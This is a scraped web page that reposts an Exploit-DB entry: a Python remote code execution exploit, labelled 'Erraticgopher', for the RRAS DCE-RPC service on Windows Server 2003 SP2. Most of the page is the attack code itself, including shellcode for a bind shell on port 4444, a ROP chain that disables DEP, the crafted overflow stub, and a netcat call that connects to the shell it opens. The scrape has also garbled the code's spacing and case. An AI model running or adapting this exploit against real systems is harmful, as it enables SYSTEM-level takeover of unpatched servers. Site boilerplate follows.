Microsoft Windows 2003 SP2-' Erraticgopher ' SMB Remote Code execution

Source: Internet
Author: User

Edb-id: 41929 Author: vportal Published: 2017-04-25
CVE: N/A Type: Remote Platform: Windows
Aliases: Erraticgopher Advisory/source: N/A Tags: N/A
e-db verified: Exploit: Download/ View Raw vulnerable App: N/A


#!/usr/bin/env python#-*-coding:utf-8-*-####################################################################### ############ by Victor Portal (vportal) for educational porpouse only ############################################## ##################################### This exploit is the Python version of the erraticgopher exploit probably # # With some modifications. Erraticgopher exploits a Memory Corruption # # (seems to bes a Heap Overflow) in the Windows Dce-rpc call Mibentr Yget. # # Because The Magic bytes, the application redirects the execution to the # # Iprtrmgr.dll library, where a InStr Uction REPS MOVS (0x641194f5) Copy # # All Te injected stubs from the heap to the stack, overwritten a return # # Address as well as the "SEH handler stored in the" Stack, being possible # to control the execution flow to Disable DEP and jump to the Shellcode # as SYSTEM user. ################################################################################### #The exploit only works if T Arget have the RRAS service enabled#tested on Windows Server 2003 SP2 import structimport sysimport timeimport os from thre Ading Import Thread from impacket import smbfrom impacket import uuidfrom impacket Imp ORT dcerpcfrom IMPACKET.DCERPC.V5 Import Transport target = sys.argv[1] print ' [-]initiating connection ' t Rans = transport. Dcerpctransportfactory (' ncacn_np:%s[\\pipe\\browser] '% target) trans.connect () print ' [-]connected to Ncacn_np:%s[\\ Pipe\\browser] '% Targetdce = trans. Dcerpc_class (trans) #RRAS Dce-rpc calldce.bind (uuid.uuidtup_to_bin (' 8f09f000-b7ed-11ce-bbd2-00001a181cad ', ' 0.0 ') )) Egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a" Egghunter + = "\x74\xef\xb8\x77\x30\x30 \x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7 "#msfvenom-a x86--platform windows-p windows/shell_bind_tcp lport=4444-b "\x00"-f pythonbuf = "buf + =" \xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33 "buf + =" \xc9\xb1\x53\x83\xc2 \X04\X31\X42\X0E\X03\X7E\XBF\XFC "buf + =" \xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8 "buf + =" \xd4\x8a\x93 \x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f "buf + =" \x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35 "buf + =" \x04 \x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43 "buf + =" \xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f " BUF + = "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01" buf + = "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\ Xc3\xa6 "buf + =" \x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff "buf + =" \x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\ Xda\xad\xc0\xd2 "buf + =" \x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9 "buf + =" \xb2\x98\x03\x82\x5f\xcc\x39\ Xc9\x37\x21\x70\xf1\xc7 "buf + =" \x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51 "buf + =" \xde\x43\x44\x5a\x1f\ x4a\x83\x0e\x4f\xe4\x22\x2f\x04 "buf + =" \xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\X68\xa9 "buf + =" \xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23 "buf + =" \x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\ xbb\xc5\x51\x98 "buf + =" \x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97 "buf + =" \x39\x26\x1a\xbf\x2e\xb1\xd0\ X2e\x1d\x23\xe4\x7a\xf5 "buf + =" \xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5 "buf + =" \xc5\x61\x24\x04\x93\ X4a\xec\xd3\x60\x54\xed\x96\xdd "buf + =" \x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b "buf + =" \xf1\x53\xd8\ x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b "buf + =" \x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9 "buf + =" \x6f\ x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90 "buf + =" \x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8 "buf + = "\xc4\x25\x3d\xe9" #NX disable routine for Windows Server 2003 sp2rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, Retn ws_ 32.dllrop + = "\x45" *16rop + = "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dllrop + = "\x5d\x7a\x81\x7c" #ret 20rop + = "\x71\x42\x38\x77" #jmp esprop + = "\xf6\xe7\xbd\x77" #add esp,2c; Retn Msvcrt.dllrop + = "\x90" * + egghunter + "\x90" *42rop + = "\x17\xf5\x83\x7c" #Disable NX routinerop + = "\x90" = "\x2" 1\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\ X08\x00\x00\x00 "#Magic bytesstub + =" \x41 "*20 + ROP +" \XCC "*100 +" w00tw00t "+ buf +" \x42 "* (1313-20-len (ROP) -100-8-len ( BUF)) Stub + = "\x12" #Magic bytestub + = "\x46" *522stub + = "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes Dce.call (0x1d, S Tub) #0x1d Mibentryget (vulnerable function) print "[-]exploit sent to target successfully ..." print "Waiting for Shell: ." Time.sleep (5) Os.system ("NC" + target + "4444")

  

Microsoft Windows 2003 SP2-' Erraticgopher ' SMB Remote Code execution

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.